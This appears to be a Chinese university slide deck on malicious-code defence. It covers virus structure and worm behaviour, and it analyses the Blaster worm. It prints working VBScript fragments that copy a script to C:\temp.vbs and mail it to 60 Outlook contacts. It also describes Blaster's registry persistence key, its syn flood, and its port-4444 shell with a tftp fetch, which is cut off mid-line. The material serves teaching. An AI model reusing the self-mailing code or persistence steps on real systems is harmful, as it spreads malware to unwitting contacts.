第6章 网络安全防护技术.ppt

6.3 恶意代码防范与应急响应 6.3.2 网络病毒及其防范 2.计算机病毒的结构及工作机制 （1）计算机病毒的结构 计算机病毒的基本特征是引导、触发、传染和破坏，因此一个计算机病毒一般由引导模块、触发模块、传染模块和破坏模块组成。 计算机病毒工作机制示意图 第6章 网络安全防护技术 6.3 恶意代码防范与应急响应 6.3.2 网络病毒及其防范 3.典型邮件病毒代码分析 通过Outlook传播的病毒基本上用VBScript语言编写而成，其自我复制原理也是利用程序本身的脚本内容复制一份到一个临时文件，然后再在传播环节将其作为附件发送出去。 例如，使用如下两行代码就可以将自身复制到C盘根目录下的temp.vbs文件中。 Set fso=CreateObject(“Scripting.FileSystemObject”) Fso.GetFile(WScript.ScriptFullName).Copy(“C:\\temp.vbs”) 其中，第一行创建一个文件系统对象。第二行前面是打开这个脚本文件，WScript.ScriptFullName用于指明是这个程序本身，即一个完整的路径文件名；用GetFile函数获得这个文件；使用Copy函数将这个文件复制到C盘根目录下的temp.vbs文件中。 第6章 网络安全防护技术 6.3 恶意代码防范与应急响应 6.3.2 网络病毒及其防范 3.典型邮件病毒代码分析 如下的代码段可实现邮件病毒的传播： Set ola=CreateObject(“Outlook.Application”) On Error Resume Next for i=1 to 60 Set Mail=ola.CreateItem(0) Mail.to=ola.GetNameSpace(“MAPI”).AddressLists(1).AddressEntries(x) Mail.Subject=“Betreffder E-Mail” Mail.Body=“Textder E-Mail” Mail.Attachments.Add(“C:\\temp.vbs”) Mail.Send Ola.Quit 第6章 网络安全防护技术 6.3 恶意代码防范与应急响应 6.3.3 网络蠕虫 1.蠕虫病毒 蠕虫(Worm)，从广义上来讲一般认为是一种通过网络传播的恶性病毒，但蠕虫病毒与一般病毒有很大区别，蠕虫是一种通过网络传播的恶性病毒，具有病毒的一些共性，如传播性、隐蔽性、破坏性等；同时又有自己的一些特征，如不利用文件寄生(只存在于内存中)，对网络造成拒绝服务等。 第6章 网络安全防护技术 6.3 恶意代码防范与应急响应 6.3.3 网络蠕虫 1.蠕虫病毒 蠕虫的工作过程一般为： ①扫描：蠕虫开始随机选取某一段IP地址，然后对这一IP地址段上的主机进行扫描，探测存在漏洞的主机。有时可能会不断重复这一扫描过程。这样，随着蠕虫的传播，新感染的主机也开始进行这种扫描。网络上的扫描包就越多。 ②攻击：当蠕虫扫描到网络中存在漏洞的主机后，就开始利用自身的破坏功能获取主机的管理员权限。 ③利用原主机与新主机的交互，将蠕虫程序复制到新主机并启动。 第6章 网络安全防护技术 6.3 恶意代码防范与应急响应 6.3.3 网络蠕虫 2.蠕虫程序的功能结构和传播流程 蠕虫程序的功能结构模型 第6章 网络安全防护技术 6.3 恶意代码防范与应急响应 6.3.3 网络蠕虫 2.蠕虫程序的功能结构和传播流程 蠕虫程序传播流程 第6章 网络安全防护技术 6.3 恶意代码防范与应急响应 6.3.3 网络蠕虫 3.典型蠕虫病毒实例分析 冲击波蠕虫病毒执行流程如下: 1)病毒运行时首先在内存中建立一个名为:“msblast.exe”的进程，该进程就是活的病毒体。病毒还会修改注册表，在“HKEY_LOCAL_MACH INE\SOFTWARE\Microsoft\Windows\CurrentVersion \Run”中添加键值:“windows autoupdate = msblast.exe”，这样在每次启动系统时，病毒就会自动运行。 2)判断BILLY互斥体，如果已经感染，蠕虫退出。 3)以20秒为间隔，检测一次网络连接状态。若未连入网络，永远循环。 4)判断日期大于15号、月份大于8，蠕虫启动syn flood攻击某网站更新站点，例如的Web服务端口80。 5)首先感染子网IP地址，然后随机感染外网IP地址。 6)感染其它主机，若缓冲区溢出成功，远程主机会在4444端口监听，提供cmd shell服务；然后本地开启tftp(69端口)服务，接着利用连接4444端口socket发送命令tftp -